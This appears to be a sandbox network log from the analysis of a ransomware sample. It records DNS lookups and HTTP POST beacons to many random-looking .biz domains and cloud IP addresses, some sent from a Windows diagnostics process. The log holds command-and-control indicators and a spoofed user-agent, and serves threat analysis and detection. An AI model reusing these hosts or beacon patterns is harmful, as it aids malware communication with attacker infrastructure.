Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rynmcq.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=c3f4a1290c31130406fdf4f0480055a0|191.101.209.39|1717923881|1717923881|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

hlzfuyy.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

hlzfuyy.biz

IN A

Response

hlzfuyy.biz

IN A

34.211.97.45
DNS

hlzfuyy.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

hlzfuyy.biz

IN A

Response

hlzfuyy.biz

IN A

34.211.97.45
DNS

uaafd.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

uaafd.biz

IN A

Response

uaafd.biz

IN A

3.254.94.185
DNS

uaafd.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

uaafd.biz

IN A

Response

uaafd.biz

IN A

3.254.94.185
POST

http://hlzfuyy.biz/lkcithrucnqqtmic

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

34.211.97.45:80

Request

POST /lkcithrucnqqtmic HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hlzfuyy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ccfdf71fcd4230f491686604d8878cd4|191.101.209.39|1717923881|1717923881|0|1|0; path=/; domain=.hlzfuyy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://uaafd.biz/rmubpo

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

3.254.94.185:80

Request

POST /rmubpo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: uaafd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4cc929496d2b65cdb9342de5404e8737|191.101.209.39|1717923881|1717923881|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

eufxebus.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

eufxebus.biz

IN A

Response

eufxebus.biz

IN A

107.178.223.183

eufxebus.biz

IN A

104.155.138.21
POST

http://eufxebus.biz/p

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

107.178.223.183:80

Request

POST /p HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: eufxebus.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Content-Length: 0
DNS

rffxu.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

rffxu.biz

IN A

Response

rffxu.biz

IN A

34.246.200.160
POST

http://rffxu.biz/lcjiuyiv

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

34.246.200.160:80

Request

POST /lcjiuyiv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rffxu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=61da6dad7a9db8520a7ae1cbe2edd498|191.101.209.39|1717923882|1717923882|0|1|0; path=/; domain=.rffxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

cikivjto.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

cikivjto.biz

IN A

Response

cikivjto.biz

IN A

44.213.104.86
POST

http://cikivjto.biz/qvb

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.213.104.86:80

Request

POST /qvb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cikivjto.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b45829efe7fc39945fe0d93d8b904418|191.101.209.39|1717923882|1717923882|0|1|0; path=/; domain=.cikivjto.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

qncdaagct.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

qncdaagct.biz

IN A

Response

qncdaagct.biz

IN A

34.218.204.173
DNS

qncdaagct.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

qncdaagct.biz

IN A

Response

qncdaagct.biz

IN A

34.218.204.173
POST

http://qncdaagct.biz/hbvlopxsdopapmg

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

34.218.204.173:80

Request

POST /hbvlopxsdopapmg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qncdaagct.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=17fb0e1c6689dcb7e1019770591db440|191.101.209.39|1717923882|1717923882|0|1|0; path=/; domain=.qncdaagct.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

shpwbsrw.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

shpwbsrw.biz

IN A

Response

shpwbsrw.biz

IN A

13.251.16.150
POST

http://shpwbsrw.biz/gpxarmmnshx

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

13.251.16.150:80

Request

POST /gpxarmmnshx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: shpwbsrw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1e791e7ea81ea02eb3f16e841008fd14|191.101.209.39|1717923883|1717923883|0|1|0; path=/; domain=.shpwbsrw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

cjvgcl.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

cjvgcl.biz

IN A

Response

cjvgcl.biz

IN A

54.80.154.23
POST

http://cjvgcl.biz/apqkcmmypmyevsg

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.80.154.23:80

Request

POST /apqkcmmypmyevsg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cjvgcl.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5726dbd43f54feb4d127a802a73b3a44|191.101.209.39|1717923884|1717923884|0|1|0; path=/; domain=.cjvgcl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

neazudmrq.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

neazudmrq.biz

IN A

Response

neazudmrq.biz

IN A

3.237.86.197
DNS

neazudmrq.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

neazudmrq.biz

IN A

Response

neazudmrq.biz

IN A

3.237.86.197
POST

http://neazudmrq.biz/nivorgwre

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

3.237.86.197:80

Request

POST /nivorgwre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: neazudmrq.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3cc3fc17ab872e50a1bc2d2729611afb|191.101.209.39|1717923884|1717923884|0|1|0; path=/; domain=.neazudmrq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

pgfsvwx.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

pgfsvwx.biz

IN A

Response

pgfsvwx.biz

IN A

54.80.154.23
POST

http://pgfsvwx.biz/bmrvmxjixneixwym

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.80.154.23:80

Request

POST /bmrvmxjixneixwym HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pgfsvwx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8d204ea516b4bbc38a4e08416e5ea607|191.101.209.39|1717923884|1717923884|0|1|0; path=/; domain=.pgfsvwx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

aatcwo.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

aatcwo.biz

IN A

Response

aatcwo.biz

IN A

34.218.204.173
DNS

aatcwo.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

aatcwo.biz

IN A

Response

aatcwo.biz

IN A

34.218.204.173
POST

http://aatcwo.biz/chjrewmnjfqktvdo

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

34.218.204.173:80

Request

POST /chjrewmnjfqktvdo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: aatcwo.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9c149cb86b60c114953842e82dd3072e|191.101.209.39|1717923885|1717923885|0|1|0; path=/; domain=.aatcwo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

kcyvxytog.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

kcyvxytog.biz

IN A

Response

kcyvxytog.biz

IN A

18.208.156.248
POST

http://kcyvxytog.biz/iulohcbbyxgf

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

18.208.156.248:80

Request

POST /iulohcbbyxgf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: kcyvxytog.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=67072d5fd505c9f8456ff56aef615a1a|191.101.209.39|1717923885|1717923885|0|1|0; path=/; domain=.kcyvxytog.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

nwdnxrd.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

nwdnxrd.biz

IN A

Response

nwdnxrd.biz

IN A

54.244.188.177
POST

http://nwdnxrd.biz/osir

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.244.188.177:80

Request

POST /osir HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: nwdnxrd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d7e8782671acc1defa0aa8df44369dcb|191.101.209.39|1717923885|1717923885|0|1|0; path=/; domain=.nwdnxrd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ereplfx.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

ereplfx.biz

IN A

Response

ereplfx.biz

IN A

44.213.104.86
DNS

ereplfx.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

ereplfx.biz

IN A

Response

ereplfx.biz

IN A

44.213.104.86
POST

http://ereplfx.biz/eohh

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.213.104.86:80

Request

POST /eohh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ereplfx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:45 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7086b17ac76fa378922987c0fa2ee6a6|191.101.209.39|1717923885|1717923885|0|1|0; path=/; domain=.ereplfx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ptrim.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

ptrim.biz

IN A

Response

ptrim.biz

IN A

18.141.10.107
POST

http://ptrim.biz/ssdnnjxbkrt

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

18.141.10.107:80

Request

POST /ssdnnjxbkrt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ptrim.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=f700ab4934c022cd815938378f6dee4e|191.101.209.39|1717923886|1717923886|0|1|0; path=/; domain=.ptrim.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

znwbniskf.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

znwbniskf.biz

IN A

Response

znwbniskf.biz

IN A

34.218.204.173
DNS

znwbniskf.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

znwbniskf.biz

IN A

Response

znwbniskf.biz

IN A

34.218.204.173
POST

http://znwbniskf.biz/ibnm

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

34.218.204.173:80

Request

POST /ibnm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: znwbniskf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9401e9ac56c5a4c6674f29d257e46ce5|191.101.209.39|1717923887|1717923887|0|1|0; path=/; domain=.znwbniskf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

cpclnad.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

cpclnad.biz

IN A

Response

cpclnad.biz

IN A

3.237.86.197
DNS

cpclnad.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

cpclnad.biz

IN A

Response

cpclnad.biz

IN A

3.237.86.197
POST

http://cpclnad.biz/jxvyh

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

3.237.86.197:80

Request

POST /jxvyh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cpclnad.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:47 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=50db87fbc1739e1523bae991b15b192c|191.101.209.39|1717923887|1717923887|0|1|0; path=/; domain=.cpclnad.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

mjheo.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

mjheo.biz

IN A

Response

mjheo.biz

IN A

3.237.86.197
POST

http://mjheo.biz/fuqfinxkqnac

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

3.237.86.197:80

Request

POST /fuqfinxkqnac HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mjheo.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a0409e9a404b11ce1ac830790a7d69d7|191.101.209.39|1717923888|1717923888|0|1|0; path=/; domain=.mjheo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

pwlqfu.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

pwlqfu.biz

IN A

Response

pwlqfu.biz

IN A

34.246.200.160
POST

http://pwlqfu.biz/bicnqonoen

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

34.246.200.160:80

Request

POST /bicnqonoen HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pwlqfu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=88ea3be6b149c2f61fa29278843bc8b0|191.101.209.39|1717923888|1717923888|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

wluwplyh.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

wluwplyh.biz

IN A

Response

wluwplyh.biz

IN A

18.141.10.107
DNS

wluwplyh.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

wluwplyh.biz

IN A

Response

wluwplyh.biz

IN A

18.141.10.107
POST

http://wluwplyh.biz/kncftek

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

18.141.10.107:80

Request

POST /kncftek HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wluwplyh.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=eb975a5f096655d6f39a94366d1a3952|191.101.209.39|1717923888|1717923888|0|1|0; path=/; domain=.wluwplyh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

rrqafepng.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

rrqafepng.biz

IN A

Response

rrqafepng.biz

IN A

44.200.43.61
DNS

rrqafepng.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

rrqafepng.biz

IN A

Response

rrqafepng.biz

IN A

44.200.43.61
POST

http://rrqafepng.biz/knwrrh

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

44.200.43.61:80

Request

POST /knwrrh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rrqafepng.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=6f173d27224d96a406747e0642ed66c5|191.101.209.39|1717923888|1717923888|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ctdtgwag.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ctdtgwag.biz

IN A

Response

ctdtgwag.biz

IN A

3.94.10.34
POST

http://ctdtgwag.biz/p

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

3.94.10.34:80

Request

POST /p HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ctdtgwag.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
